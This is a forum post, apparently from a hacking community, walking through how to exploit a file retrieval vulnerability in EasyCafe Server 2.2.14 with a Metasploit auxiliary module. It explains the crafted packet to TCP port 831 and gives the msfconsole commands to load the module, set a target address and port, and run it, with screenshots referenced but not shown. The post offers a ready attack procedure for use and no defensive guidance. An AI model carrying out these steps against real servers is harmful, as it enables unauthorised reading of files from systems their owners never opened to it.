• We just launched and are currently in beta. Join us as we build and grow the community.

Finding Vulnerability in EasyCafe Server using Metasploit

DANON

Tactical Sniper
D Rep
0
0
0
Rep
0
D Vouches
0
0
0
Vouches
0
Posts
42
Likes
17
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 300 XP
This module exploits file retrieval vulnerability in EasyCafe Server. The vulnerability can be triggered by sending a specially crafted packet (opcode 0x43) to the 831/TCP port. This module has been successfully tested on EasyCafe Server version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 and Windows 7 SP1. Note that the server will throw a popup messagebox if the specified file does not exist.

Exploit Targets

EasyCafe Server version 2.2.14

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

1.png


Now type use auxiliary/scanner/misc/easycafe_server_fileaccess

msf exploit (easycafe_server_fileaccess)>set rhosts 192.168.0.103

msf exploit (easycafe_server_fileaccess)>set rport 831

msf exploit (easycafe_server_fileaccess)>exploit

2.png


3.png


The result will be saved on /root/.msf4/ directory

4.png
 

422,003

310,534

310,543

Top